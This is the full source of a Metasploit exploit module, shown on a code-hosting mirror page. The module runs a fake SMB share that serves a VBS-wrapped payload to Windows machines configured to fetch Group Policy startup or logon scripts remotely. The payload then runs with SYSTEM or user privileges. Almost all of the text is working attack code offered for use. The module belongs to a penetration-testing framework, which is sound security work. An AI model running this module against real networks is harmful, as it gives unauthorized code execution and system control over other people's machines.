Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/smb/group_policy_startup.rb
32939 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ManualRanking

8


9
  include Msf::Exploit::Remote::SMB::Server::Share

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Group Policy Script Execution From Shared Resource',

16
        'Description' => %q{

17
          This is a general-purpose module for exploiting systems with Windows Group Policy

18
          configured to load VBS startup/logon scripts from remote locations. This module runs

19
          a SMB shared resource that will provide a payload through a VBS file. Startup scripts

20
          will be executed with SYSTEM privileges, while logon scripts will be executed with the

21
          user privileges. Have into account which the attacker still needs to redirect the

22
          target traffic to the fake SMB share to exploit it successfully. Please note in some

23
          cases, it will take 5 to 10 minutes to receive a session.

24
        },

25
        'Author' => [

26
          'Sam Bertram <sbertram[at]gdssecurity.com>', # BadSamba

27
          'juan vazquez' # msf module

28
        ],

29
        'References' => [

30
          ['URL', 'http://blog.gdssecurity.com/labs/2015/1/26/badsamba-exploiting-windows-startup-scripts-using-a-maliciou.html'],

31
          ['URL', 'https://github.com/GDSSecurity/BadSamba']

32
        ],

33
        'DefaultOptions' => {

34
          'EXITFUNC' => 'thread'

35
        },

36
        'Privileged' => false,

37
        'Platform' => 'win',

38
        'Payload' => {

39
          'Space' => 2048,

40
          'DisableNops' => true

41
        },

42
        'Targets' => [

43
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],

44
          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]

45
        ],

46
        'DefaultTarget' => 0,

47
        'DisclosureDate' => '2015-01-26',

48
        'Notes' => {

49
          'AKA' => ['badsamba'],

50
          'Stability' => UNKNOWN_STABILITY,

51
          'Reliability' => UNKNOWN_RELIABILITY,

52
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

53
        }

54
      )

55
    )

56


57
    register_options(

58
      [

59
        OptString.new('FILE_NAME', [ false, 'VBS File name to share (Default: random .vbs)'])

60
      ]

61
    )

62


63
    deregister_options('FILE_CONTENTS')

64
  end

65


66
  def setup

67
    super

68
    self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(rand(4..6))}.vbs"

69
    @custom_payloads = {}

70
    print_status("File available on #{unc}...")

71
  end

72


73
  def on_client_connect(client)

74
    super(client)

75


76
    unless @custom_payloads[:client]

77
      p = regenerate_payload(client)

78
      exe = p.encoded_exe

79
      @custom_payloads[client] = Msf::Util::EXE.to_exe_vbs(exe)

80
    end

81
  end

82


83
  def get_file_contents(client:)

84
    contents = @custom_payloads[client] || super(client: client)

85


86
    contents

87
  end

88
end

89


90